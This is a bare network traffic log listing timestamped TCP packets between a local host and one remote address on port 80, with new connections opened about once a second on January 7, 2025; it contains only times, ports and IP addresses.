Jan 7, 2025 12:32:18.365715981 CET	80	49760	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:18.365777969 CET	80	49760	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:18.365850925 CET	49760	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:18.365896940 CET	49760	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:18.370631933 CET	80	49760	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:18.512625933 CET	49761	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:18.517462969 CET	80	49761	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:18.517539024 CET	49761	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:18.519838095 CET	49761	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:18.524538994 CET	80	49761	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:18.524599075 CET	49761	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:18.529349089 CET	80	49761	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:19.255095005 CET	80	49761	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:19.255143881 CET	80	49761	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:19.255213022 CET	49761	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:19.255258083 CET	49761	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:19.260026932 CET	80	49761	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:19.401726007 CET	49762	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:19.406513929 CET	80	49762	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:19.406598091 CET	49762	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:19.408777952 CET	49762	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:19.413511038 CET	80	49762	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:19.413561106 CET	49762	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:19.418283939 CET	80	49762	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:20.161349058 CET	80	49762	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:20.161427975 CET	80	49762	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:20.161554098 CET	49762	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:20.161554098 CET	49762	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:20.166304111 CET	80	49762	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:20.307646990 CET	49763	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:20.312530041 CET	80	49763	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:20.312824011 CET	49763	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:20.314740896 CET	49763	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:20.319586039 CET	80	49763	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:20.319720030 CET	49763	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:20.324559927 CET	80	49763	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:21.055150032 CET	80	49763	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:21.055262089 CET	80	49763	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:21.055284977 CET	49763	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:21.055448055 CET	49763	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:21.060111046 CET	80	49763	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:21.195571899 CET	49764	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:21.200897932 CET	80	49764	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:21.200973034 CET	49764	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:21.203125954 CET	49764	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:21.208796024 CET	80	49764	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:21.208839893 CET	49764	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:21.213546991 CET	80	49764	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:21.994616032 CET	80	49764	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:21.994631052 CET	80	49764	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:21.994640112 CET	80	49764	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:21.994685888 CET	49764	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:21.994716883 CET	49764	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:21.994716883 CET	49764	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:21.999489069 CET	80	49764	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:22.174820900 CET	49765	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:22.179678917 CET	80	49765	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:22.179876089 CET	49765	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:22.185805082 CET	49765	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:22.190634012 CET	80	49765	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:22.190721035 CET	49765	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:22.195482016 CET	80	49765	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:22.906075954 CET	80	49765	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:22.906260014 CET	80	49765	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:22.907710075 CET	49765	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:22.920079947 CET	49765	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:22.924877882 CET	80	49765	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:23.069264889 CET	49766	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:23.074100018 CET	80	49766	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:23.074220896 CET	49766	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:23.078553915 CET	49766	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:23.083334923 CET	80	49766	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:23.083462000 CET	49766	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:23.088294029 CET	80	49766	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:23.819855928 CET	80	49766	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:23.819912910 CET	80	49766	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:23.819943905 CET	49766	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:23.819976091 CET	49766	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:23.824755907 CET	80	49766	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:23.961863995 CET	49767	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:23.966806889 CET	80	49767	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:23.966881037 CET	49767	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:23.969023943 CET	49767	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:23.973822117 CET	80	49767	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:23.973870039 CET	49767	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:23.978713036 CET	80	49767	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:24.698086023 CET	80	49767	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:24.698137045 CET	80	49767	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:24.698249102 CET	49767	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:24.698249102 CET	49767	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:24.703088045 CET	80	49767	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:24.862596989 CET	49768	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:24.867563963 CET	80	49768	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:24.867660046 CET	49768	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:24.875807047 CET	49768	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:24.880567074 CET	80	49768	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:24.880635977 CET	49768	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:24.885471106 CET	80	49768	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:25.606833935 CET	80	49768	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:25.606872082 CET	80	49768	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:25.606967926 CET	49768	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:25.624356985 CET	49768	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:25.629185915 CET	80	49768	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:25.818254948 CET	49769	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:25.823084116 CET	80	49769	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:25.823156118 CET	49769	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:25.824960947 CET	49769	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:25.829705000 CET	80	49769	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:25.829746008 CET	49769	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:25.834505081 CET	80	49769	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:26.577548981 CET	80	49769	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:26.577641010 CET	49769	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:26.577671051 CET	80	49769	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:26.577716112 CET	49769	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:26.582437038 CET	80	49769	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:26.711381912 CET	49770	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:26.716252089 CET	80	49770	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:26.716329098 CET	49770	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:26.718461037 CET	49770	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:26.723297119 CET	80	49770	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:26.723357916 CET	49770	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:26.729289055 CET	80	49770	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:27.430458069 CET	80	49770	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:27.430476904 CET	80	49770	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:27.430546999 CET	49770	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:27.430546999 CET	49770	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:27.435343981 CET	80	49770	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:27.570641041 CET	49771	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:27.575476885 CET	80	49771	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:27.575673103 CET	49771	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:27.577661037 CET	49771	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:27.582458973 CET	80	49771	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:27.582509995 CET	49771	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:27.587279081 CET	80	49771	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:28.316294909 CET	80	49771	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:28.316330910 CET	80	49771	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:28.316401958 CET	49771	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:28.342448950 CET	49771	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:28.347249031 CET	80	49771	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:28.606966972 CET	49772	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:28.611800909 CET	80	49772	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:28.611865997 CET	49772	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:28.614263058 CET	49772	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:28.619009972 CET	80	49772	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:28.619054079 CET	49772	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:28.623843908 CET	80	49772	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:29.349251032 CET	80	49772	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:29.349322081 CET	80	49772	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:29.349356890 CET	49772	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:29.349390984 CET	49772	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:29.354115963 CET	80	49772	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:29.492511034 CET	49773	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:29.497399092 CET	80	49773	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:29.497567892 CET	49773	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:29.499579906 CET	49773	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:29.504339933 CET	80	49773	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:29.504390001 CET	49773	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:29.509110928 CET	80	49773	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:30.221826077 CET	80	49773	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:30.221914053 CET	80	49773	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:30.221935034 CET	49773	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:30.221967936 CET	49773	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:30.226727009 CET	80	49773	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:30.370486975 CET	49774	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:30.375319958 CET	80	49774	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:30.375519991 CET	49774	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:30.377583981 CET	49774	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:30.382375002 CET	80	49774	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:30.382420063 CET	49774	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:30.387238026 CET	80	49774	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:31.090928078 CET	80	49774	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:31.090975046 CET	80	49774	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:31.091089010 CET	49774	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:31.095319986 CET	49774	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:31.100066900 CET	80	49774	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:31.243015051 CET	49775	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:31.248189926 CET	80	49775	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:31.248260975 CET	49775	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:31.250375986 CET	49775	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:31.256553888 CET	80	49775	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:31.256603003 CET	49775	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:31.261343002 CET	80	49775	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:31.988487959 CET	80	49775	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:31.988609076 CET	80	49775	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:31.988682985 CET	49775	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:31.989700079 CET	49775	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:31.994435072 CET	80	49775	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:32.140525103 CET	49776	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:32.147083998 CET	80	49776	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:32.147154093 CET	49776	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:32.149305105 CET	49776	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:32.155565023 CET	80	49776	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:32.155613899 CET	49776	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:32.161897898 CET	80	49776	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:32.891259909 CET	80	49776	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:32.891320944 CET	80	49776	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:32.891493082 CET	49776	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:32.891539097 CET	49776	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:32.896297932 CET	80	49776	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:33.021183968 CET	49777	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:33.025952101 CET	80	49777	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:33.026021957 CET	49777	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:33.028031111 CET	49777	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:33.032846928 CET	80	49777	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:33.032901049 CET	49777	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:33.037724972 CET	80	49777	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:33.772023916 CET	80	49777	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:33.772099018 CET	80	49777	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:33.772124052 CET	49777	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:33.772147894 CET	49777	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:33.776885033 CET	80	49777	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:33.911725998 CET	49778	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:33.916560888 CET	80	49778	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:33.916637897 CET	49778	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:33.918819904 CET	49778	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:33.924356937 CET	80	49778	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:33.924411058 CET	49778	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:33.929934025 CET	80	49778	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:34.665445089 CET	80	49778	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:34.665544033 CET	49778	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:34.665618896 CET	80	49778	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:34.665663004 CET	49778	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:34.670301914 CET	80	49778	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:34.802526951 CET	49779	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:34.807374954 CET	80	49779	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:34.807456017 CET	49779	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:34.809441090 CET	49779	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:34.814224958 CET	80	49779	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:34.814296961 CET	49779	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:34.819117069 CET	80	49779	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:35.557409048 CET	80	49779	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:35.557501078 CET	49779	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:35.557590008 CET	80	49779	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:35.557636976 CET	49779	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:35.562339067 CET	80	49779	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:35.692531109 CET	49780	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:35.697366953 CET	80	49780	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:35.697537899 CET	49780	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:35.699280977 CET	49780	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:35.704044104 CET	80	49780	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:35.704113960 CET	49780	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:35.708832979 CET	80	49780	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:36.434782982 CET	80	49780	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:36.434833050 CET	80	49780	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:36.434902906 CET	49780	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:36.434942961 CET	49780	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:36.439728022 CET	80	49780	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:36.568737030 CET	49781	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:36.573637962 CET	80	49781	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:36.574681997 CET	49781	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:36.583699942 CET	49781	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:36.588476896 CET	80	49781	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:36.588546038 CET	49781	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:36.593347073 CET	80	49781	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:37.324584961 CET	80	49781	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:37.324605942 CET	80	49781	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:37.324671984 CET	49781	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:37.324695110 CET	49781	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:37.329468012 CET	80	49781	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:37.461569071 CET	49782	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:37.466445923 CET	80	49782	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:37.466519117 CET	49782	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:37.468777895 CET	49782	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:37.473543882 CET	80	49782	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:37.473583937 CET	49782	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:37.478353024 CET	80	49782	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:38.192630053 CET	80	49782	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:38.192702055 CET	80	49782	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:38.192728996 CET	49782	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:38.192754030 CET	49782	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:38.197505951 CET	80	49782	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:38.348732948 CET	49783	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:38.353553057 CET	80	49783	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:38.353615046 CET	49783	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:38.355763912 CET	49783	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:38.360497952 CET	80	49783	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:38.360546112 CET	49783	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:38.365258932 CET	80	49783	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:39.104120970 CET	80	49783	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:39.104302883 CET	80	49783	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:39.104382992 CET	49783	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:39.104433060 CET	49783	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:39.109271049 CET	80	49783	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:39.241365910 CET	49784	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:39.246179104 CET	80	49784	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:39.246247053 CET	49784	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:39.248174906 CET	49784	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:39.252926111 CET	80	49784	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:39.253004074 CET	49784	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:39.257805109 CET	80	49784	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:39.957216978 CET	80	49784	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:39.957326889 CET	49784	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:39.957412004 CET	80	49784	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:39.957456112 CET	49784	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:39.962119102 CET	80	49784	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:40.103116035 CET	49785	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:40.108005047 CET	80	49785	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:40.108149052 CET	49785	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:40.109919071 CET	49785	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:40.114725113 CET	80	49785	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:40.116039038 CET	49785	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:40.120793104 CET	80	49785	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:40.837862968 CET	80	49785	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:40.837949038 CET	80	49785	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:40.840673923 CET	49785	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:40.840719938 CET	49785	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:40.845505953 CET	80	49785	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:40.974325895 CET	49786	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:40.980818987 CET	80	49786	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:40.980886936 CET	49786	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:40.982682943 CET	49786	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:40.987442017 CET	80	49786	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:40.987508059 CET	49786	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:40.993767977 CET	80	49786	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:41.705457926 CET	80	49786	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:41.705574989 CET	49786	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:41.705602884 CET	80	49786	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:41.705739021 CET	49786	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:41.710382938 CET	80	49786	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:41.850157976 CET	49787	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:41.855065107 CET	80	49787	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:41.855134964 CET	49787	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:41.856955051 CET	49787	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:41.861704111 CET	80	49787	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:41.861753941 CET	49787	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:41.866514921 CET	80	49787	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:42.590842962 CET	80	49787	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:42.590935946 CET	80	49787	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:42.591000080 CET	49787	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:42.591031075 CET	49787	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:42.595767021 CET	80	49787	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:42.725212097 CET	49788	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:42.730037928 CET	80	49788	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:42.730127096 CET	49788	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:42.732088089 CET	49788	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:42.736828089 CET	80	49788	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:42.736881018 CET	49788	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:42.741592884 CET	80	49788	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:43.480823994 CET	80	49788	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:43.480856895 CET	80	49788	94.156.177.41	192.168.2.4
